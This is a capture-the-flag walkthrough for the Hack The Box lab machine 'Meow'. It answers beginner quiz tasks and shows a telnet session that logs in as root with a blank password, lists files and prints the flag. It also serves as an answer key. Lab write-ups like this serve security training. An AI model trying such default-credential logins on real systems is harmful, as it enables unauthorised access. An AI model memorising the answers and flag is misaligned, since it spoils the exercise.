HTB: Meow - Write-Up
A walkthrough for the HTB machine Meow, focusing on gaining root access and retrieving the flag.
TARGET MACHINE IP ADDRESS
1
10.129.36.124
TASK 1
What does the acronym VM stand for?
Ans:
1
Virtual Machine
TASK 2
What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It’s also known as a console or shell.
Task 2 Hint
It's also the name of the location in any airport where passengers transfer between ground transportation and the facilities that allow them to board their flight.Ans:
1
Terminal
TASK 3
What service do we use to form our VPN connection into HTB labs?
Task 3 Hint
It's an open source VPN service which comes preinstalled on most Linux-based Operating Systems.Ans:
1
Openvpn
TASK 4
What tool do we use to test our connection to the target with an ICMP echo request?
Task 4 Hint
It's also half of the name of a very popular sport, also known as table tennis.Ans:
1
Ping
TASK 5
What is the name of the most common tool for finding open ports on a target?
Task 5 Hint
Short for Network Mapper, a popular network host scanning tool.Ans:
1
Nmap
TASK 6
What service do we identify on port 23/tcp during our scans?
Task 6 Hint
This service runs on port 23/tcp by default, meaning we can research the port on Google and receive the correct result easily.Ans:
1
telnet
TASK 7
What username is able to log into the target over telnet with a blank password?
Task 7 Hint
It is popularly known as the administrative account for any Linux-based Operating System, residing at the highest level of privilege on any such system.Ans:
1
root
SUBMIT FLAG
Submit root flag:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
┌──(root㉿neo)-[~]
└─# telnet 10.129.36.124 -l root
Trying 10.129.36.124...
Connected to 10.129.36.124.
Escape character is '^]'.
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 24 Jul 2024 07:53:52 AM UTC
System load: 0.0
Usage of /: 41.7% of 7.75GB
Memory usage: 4%
Swap usage: 0%
Processes: 137
Users logged in: 0
IPv4 address for eth0: 10.129.36.124
IPv6 address for eth0: dead:beef::250:56ff:feb0:ffca
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
^Last login: Mon Sep 6 15:15:23 UTC 2021 from 10.10.14.18 on pts/0
root@Meow:~# ^
-bash: !!: event not found
root@Meow:~# ls
flag.txt snap
root@Meow:~# cat flag.txt
b40abdfe23665f766f9c61ecba8a4c19
root@Meow:~#
Flag:
1
b40abdfe23665f766f9c61ecba8a4c19
This post is licensed under CC BY 4.0 by the author.